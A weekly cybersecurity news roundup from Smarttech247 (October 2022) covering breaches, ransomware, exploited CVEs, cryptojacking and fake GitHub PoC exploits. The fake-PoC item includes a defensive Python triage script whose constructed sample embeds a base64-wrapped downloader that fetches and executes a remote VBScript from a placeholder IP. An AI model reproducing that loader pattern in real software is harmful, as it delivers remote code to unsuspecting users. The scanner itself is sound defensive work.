Friday, October 28th, 2022

Cybersecurity Week in Review (28/10/22)

Medibank now says hackers accessed all its customers’ personal data

Customers of Australian insurance firm Medibank have had their personal information compromised in an attack by hackers. The attack also saw a large amount of health claims data accessed in the ransomware operation. An internal investigation into the attack has shown that the threat actors had far greater access to customer data than initially thought.

The following data was confirmed to be accessed:

  • All ahm customers’ personal data and significant amounts of health claims data.
  • All international student customers’ personal data and significant amounts of health claims data.
  • All Medibank customers’ personal data and significant amounts of health claims data.

While access to data and exfiltration of data are not the same thing, the threat actors did remove some of the accessed data, so customers should assume that all of it was stolen.

Just last week, Medibank assured its 2.8 million customers that there was no evidence of any customer data having been accessed. However, a few days after playing down the impact of the incident, the ransomware gang made contact to extort the company, providing a sample of 100 stolen files out of an alleged 200GB of data stolen during the attack.

Based on this development, Medibank upgraded its response and support to customers by providing the following:

  • Financial support for customers who are in a uniquely vulnerable position as a result of this crime.
  • Free identity monitoring services for customers who have had their primary ID compromised
  • Reimbursement of fees for re-issue of identity documents that have been fully compromised in this crime.
  • Specialist identity protection advice and resources from IDCARE.
  • Medibank’s mental health and wellbeing support line.

Source –

Unknown Actors are Deploying RomCom RAT to Target Ukrainian Military

A new spear-phishing campaign that uses a remote access trojan called RomCom RAT was observed targeting Ukrainian military institutions earlier this month. This marks a shift in the threat actors’ targeting: they had previously been attributed with spoofing legitimate apps such as Advanced IP Scanner and pdfFiller to drop backdoors on compromised systems.

While previous iterations of the campaign relied on a trojanized Advanced IP Scanner, the unidentified adversarial collective has since switched to pdfFiller as of October 20, indicating an active attempt on the part of the adversary to refine its tactics and thwart detection. These lookalike websites host a rogue installer package that results in the deployment of the RomCom RAT, which is capable of harvesting information and capturing screenshots, all of which is exported to a remote server.

The attacker’s latest method used on the military in Ukraine employs a phishing email with an embedded link as an initial infection vector, leading to a fake website dropping the next stage downloader. This downloader, signed using a valid digital certificate from “Blythe Consulting sp. z o.o.” for an extra layer of evasion, is then used to extract and run the RomCom RAT malware. BlackBerry said the same signer is used by the legitimate version of pdfFiller.

Besides the Ukrainian military, other targets of the campaign include IT companies, food brokers, and food manufacturing entities in the U.S., Brazil, and the Philippines. The campaign also highlights the overlap between cybercrime-motivated threat actors and targeted attack threat actors, with both now using similar tools.

Source –

Hackers Actively Exploiting Cisco AnyConnect and GIGABYTE Drivers Vulnerabilities

Cisco has warned of active exploitation attempts targeting a pair of two-year-old security flaws in the Cisco AnyConnect Secure Mobility Client for Windows. Tracked as CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), the vulnerabilities could enable local authenticated attackers to perform DLL hijacking and copy arbitrary files to system directories with elevated privileges. While CVE-2020-3153 was addressed by Cisco in February 2020, a fix for CVE-2020-3433 was shipped in August 2020.

The alert comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) moved to add the two flaws to its Known Exploited Vulnerabilities (KEV) catalog, alongside four bugs in GIGABYTE drivers, citing evidence of active abuse in the wild. The vulnerabilities — assigned the identifiers CVE-2018-19320, CVE-2018-19321, CVE-2018-19322, and CVE-2018-19323, and patched in May 2020 — could permit an attacker to escalate privileges and run malicious code to take complete control of an affected system.

The development also follows a full report released last week by Singapore-based Group-IB detailing the tactics employed by a Russian-speaking ransomware group called OldGremlin in its attacks on entities operating in the country. One of the group’s primary methods of gaining initial access is exploiting the aforementioned Cisco AnyConnect flaws, while the GIGABYTE driver weaknesses are abused to disable security software, a technique also used by the BlackByte ransomware group.

Source –

Massive cryptomining campaign abuses free-tier cloud dev resources

GitHub, Heroku, and Buddy services have been targeted to mine cryptocurrency at the provider’s expense. The automated and large-scale ‘freejacking’ operation relies on abusing the limited resources offered to free-tier cloud accounts to generate a tiny profit from each free account, which, when combined, becomes something more significant.

The threat actor behind the campaign, called ‘Purpleurchin,’ was observed performing over a million function calls daily, using CI/CD service providers such as GitHub (300 accounts), Heroku (2,000 accounts), and Buddy (900 accounts). The use of those accounts is rotated and channeled through 130 Docker Hub images with mining containers, while obfuscation on all operational levels kept Purpleurchin undetected until now.

Operation details

The core of the operation is a linuxapp container (‘linuxapp84744474447444744474’) that acts as the command and control (C2) server and Stratum server, coordinating all active mining agents and directing them to the threat actor’s mining pool. A shell script (‘userlinux8888’) is used to automate the creation of GitHub accounts, create a repository, and replicate the workflow using GitHub Actions. All GitHub Actions are obfuscated using random strings for their names. Purpleurchin uses OpenVPN and Namecheap VPN to register each account from a different IP address to evade GitHub’s bot activity detection.

The GitHub Actions launch over 30 instances of Docker images on each run, using pre-set arguments for the script to be executed, the proxy IP and port to connect to, the Stratum ID name, and the maximum memory and CPU amounts to use. Eventually, another script (“linuxwebapp88”) validates the configuration on the Stratum server, receives the Docker command contained in the GitHub repository, and starts the miner container.

The miner uses a tiny part of the server’s CPU power to stealthily mine a range of crypto coins such as Tidecoin, Onyx, Sugarchain, Sprint, Yenten, Arionum, MintMe, and Bitweb. The mining process employs a custom Stratum mining protocol relay that hampers network scanners’ ability to discover the outbound connections to mining pools.

The cryptocurrencies chosen by the mining threat actors are only marginally profitable, so it can be assumed that the operation is either in an early experimental stage or is trying to take control of these blockchains by building a 51% majority of the network.

Source –

CISA Warns of Daixin Team Hackers Targeting Health Organizations With Ransomware

US cyber security and intelligence agencies have issued a joint warning about attacks perpetrated by a gang of cybercriminals known as the Daixin Team, which primarily targets the country’s health system. The Daixin Team is a ransomware and data extortion group that has targeted the Healthcare and Public Health (HPH) sector with ransomware and data extortion operations since at least June 2022. The alert was published Friday by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS).

Over the past few months, the group has been linked to numerous ransomware incidents in the Healthcare and Public Health (HPH) industry, involving the encryption of servers related to electronic health records, diagnostics, imaging, and intranet services. They are also said to have exfiltrated personally identifiable information (PII) and patient health information (PHI) as part of a double extortion scheme to obtain ransom from victims. Once inside a network, the actors move laterally using the remote desktop protocol (RDP) and secure shell (SSH), then gain elevated privileges using techniques such as credential dumping.

One such attack targeted OakBend Medical Center on September 1, 2022, with the group claiming to have harvested approximately 3.5 GB of data, including more than one million patient and staff information records. A sample of 2,000 medical records was also posted on the data leak website, which included names, genders, dates of birth, social security numbers, addresses and more.

The Daixin Team’s ransomware is based on another strain called Babuk that was leaked in September 2021, and has been used as a foundation for a number of file-encrypting malware families such as Rook, Night Sky, Pandora, and Cheerscrypt. As mitigations, it’s recommended that organizations apply the latest software updates, enforce multi-factor authentication, implement network segmentation, and maintain periodic offline backups.

Source –

Apple fixes new zero-day used in attacks against iPhones, iPads

Responding to reports that a security flaw may have been actively exploited, Apple has fixed the ninth zero-day vulnerability used in attacks against iPhones since the start of the year. The bug (CVE-2022-42827) is an out-of-bounds write issue reported to Apple by an anonymous researcher, caused by software writing data outside the boundaries of the current memory buffer.

This can lead to data corruption, program crashes, or memory corruption. An attacker exploiting this zero-day could execute arbitrary code with kernel privileges. The complete list of impacted devices includes iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later.

Apple addressed the zero-day vulnerability in iOS 16.1 and iPadOS 16 with improved bounds checking. While Apple has disclosed that it knows of active exploitation reports of this vulnerability in the wild, it has yet to release any information regarding these attacks.

Source –

Cyberattack Causes Disruptions at Wholesale Giant Metro

International wholesale chain Metro has confirmed service disruptions following a cyber-attack. With headquarters in Düsseldorf, Germany, the company operates more than 680 Metro and Makro stores in 24 countries and employs more than 95,000 people worldwide.

Metro said it has determined that the outage was caused by a cyber-attack but did not provide specifics on the matter. Infrastructure disruptions suggest ransomware may be involved. Although Metro stores are operating and services are generally available, disruptions and delays may occur. Offline systems to process payments have been set up, and online orders through the web app and online store are being processed, but delays should be expected there as well.

The company has not provided details on how many of its stores might have been impacted by the incident, but reports suggest that multiple stores in Austria, France, and Germany have been suffering disruptions.

Source –

Thousands of GitHub repositories deliver fake PoC exploits with malware

Thousands of repositories on GitHub have been found to offer fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them including malware. GitHub is one of the largest code hosting platforms, and researchers use it to publish PoC exploits to help the security community verify fixes for vulnerabilities or determine the impact and scope of a flaw.

Researchers at Leiden Institute of Advanced Computer Science analysed over 47,300 repositories advertising an exploit for a vulnerability between 2017 and 2021 using the following three mechanisms:

  • IP address analysis: comparing the PoC publisher’s IP address to public blocklists, VirusTotal (VT) and AbuseIPDB.
  • Binary analysis: running VirusTotal checks on the provided executables and their hashes.
  • Hexadecimal and Base64 analysis: decoding obfuscated files before performing the binary and IP checks.

Of the 150,734 unique IPs extracted, 2,864 matched blocklist entries, 1,522 were detected as malicious in antivirus scans on VirusTotal, and 1,069 were present in the AbuseIPDB database. The binary analysis examined a set of 6,160 executables and revealed a total of 2,164 malicious samples hosted in 1,398 repositories. In total, 4,893 repositories out of the 47,313 tested were deemed malicious, most of them concerning vulnerabilities from 2020.

A plethora of different malware and harmful scripts were found, ranging from remote access trojans to Cobalt Strike. One interesting case is that of a PoC for CVE-2019-0708, commonly known as “BlueKeep”, which contains a base64-obfuscated Python script that fetches a VBScript from Pastebin. The script is the Houdini RAT, an old JavaScript-based trojan that supports remote command execution via the Windows CMD.

Software testers are advised to carefully scrutinize the PoCs they download and to run as many checks as possible before executing them. Testers should follow these three steps:

  • Carefully read the code you are about to run on your own or your customer’s network.
  • If the code is too obfuscated and would take too long to analyze manually, sandbox it in an isolated environment (for example, an isolated virtual machine) and check your network for any suspicious traffic.
  • Use open-source intelligence tools such as VirusTotal to analyze binaries.
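The three mechanisms and the three steps above combine naturally into one triage pass over a downloaded PoC. The following is an added example, not the researchers’ tooling: it walks a small repository constructed inline, peels base64 and hex layers (the BlueKeep case above hid a Pastebin fetch behind base64), extracts the IP addresses that surface at every layer, and compares them with a blocklist. The blocklist, file contents and addresses are all made up for the demonstration; a real run would feed the extracted IPs to AbuseIPDB or VirusTotal instead.

```python
import base64
import ipaddress
import re
from typing import Dict, List, Set

# Constructed sample repository (file name -> contents). exploit.py wraps a tiny
# downloader in base64, mirroring the obfuscated-loader pattern in the study.
INNER = b'import urllib.request\nurllib.request.urlopen("http://198.51.100.23/x.vbs")\n'
SAMPLE_REPO: Dict[str, str] = {
    "exploit.py": "import os\nexec(__import__('base64').b64decode('"
                  + base64.b64encode(INNER).decode() + "'))\n",
    "README.md": "PoC for CVE-XXXX-YYYY. Run exploit.py against 203.0.113.5\n",
}
# Constructed blocklist standing in for public blocklists / AbuseIPDB hits.
BLOCKLIST: Set[str] = {"198.51.100.23"}

B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")      # long base64-looking runs
HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2}){16,}")        # 32+ hex chars, even length
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_layers(text: str, depth: int = 3) -> List[str]:
    """Return the text plus every decodable base64/hex payload nested in it."""
    layers = [text]
    if depth == 0:
        return layers
    for pattern, decoder in ((B64_RE, lambda s: base64.b64decode(s, validate=True)),
                             (HEX_RE, bytes.fromhex)):
        for blob in pattern.findall(text):
            try:
                decoded = decoder(blob).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue                    # not a real payload, keep going
            layers += decode_layers(decoded, depth - 1)
    return layers


def extract_ips(texts: List[str]) -> Set[str]:
    """Collect syntactically valid, non-local IPv4 addresses from all layers."""
    ips: Set[str] = set()
    for text in texts:
        for candidate in IP_RE.findall(text):
            try:
                addr = ipaddress.ip_address(candidate)
            except ValueError:
                continue
            if not (addr.is_loopback or addr.is_link_local or addr.is_multicast):
                ips.add(candidate)
    return ips


def assess_repo(repo: Dict[str, str], blocklist: Set[str]) -> Dict[str, dict]:
    """Per file: was an encoded layer found, which IPs appeared, which are listed."""
    report = {}
    for name, content in repo.items():
        layers = decode_layers(content)
        ips = extract_ips(layers)
        report[name] = {"obfuscated": len(layers) > 1,
                        "ips": sorted(ips), "flagged": sorted(ips & blocklist)}
    return report
```

Any file whose report shows `obfuscated` with a `flagged` address is exactly the case the article warns about and belongs in a sandbox, not on a production host.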

Source –

Notorious ‘BestBuy’ hacker arraigned for running dark web market

The US Department of Justice has arraigned a notorious British hacker for allegedly running the now-defunct ‘The Real Deal’ dark web marketplace. The 34-year-old defendant Daniel Kaye (aka Bestbuy, Spdrman, Popopret, UserL0ser) allegedly ran the illicit services market between early 2015 and November 2016, when The Real Deal shut down. Threat actors used the platform to sell everything from stolen US government system credentials and hacking tools to drugs, weapons and government data.

Among the login credentials put up for sale on the dark web market, court documents mention credentials for computers belonging to NASA, the U.S. Navy and the U.S. Postal Service (USPS). Kaye also allegedly trafficked Twitter and LinkedIn accounts and conspired with a threat actor known as TheDarkOverlord to sell stolen Social Security numbers. He laundered the cryptocurrency obtained while operating The Real Deal through a Bitcoin mixer service to hide the illicit gains from law enforcement’s blockchain tracing efforts.

Kaye infamously hijacked, and accidentally took down, over 900,000 routers on Deutsche Telekom’s network in late November 2016 using a buggy Mirai botnet variant. He also advertised DDoS-for-hire services backed by a massive botnet of over 400,000 Mirai-infected IoT devices. According to the DOJ’s press release, Kaye was overseas when the indictment was filed, and in September 2022 he consented to his extradition from Cyprus to the U.S.

Source –

Twilio discloses another hack from June, blames voice phishing

Twilio has disclosed a new data breach stemming from a June 2022 security incident. The cloud communications company stated that this breach of customer information was carried out by the same threat actors who attacked it in August. The attacker used social engineering to trick an employee into handing over their credentials in a voice phishing attack.

The hackers behind the August breach accessed the data of 209 customers and 93 Authy end users after breaching some internal non-production systems using employee credentials stolen in an SMS phishing attack. Twilio found no evidence that any of its customers’ console account credentials, API keys, or authentication tokens had been accessed. While the company disclosed the incident on August 7, it has now revealed that the attackers maintained access to this environment for two more days.

Once inside Twilio’s systems, the hackers accessed customer data through administrative portals, accessed Authy 2FA accounts and codes, and registered their own devices to obtain temporary tokens. The Twilio data breach is part of a more extensive campaign by a threat actor tracked as Scatter Swine or 0ktapus that targeted at least 130 organizations, including MailChimp, Klaviyo, and Cloudflare. In response to the June and August breaches, Twilio says it has reset the credentials of the compromised employee accounts and is distributing FIDO2 tokens to all employees.

Source –


Copyright Smarttech247 - 2021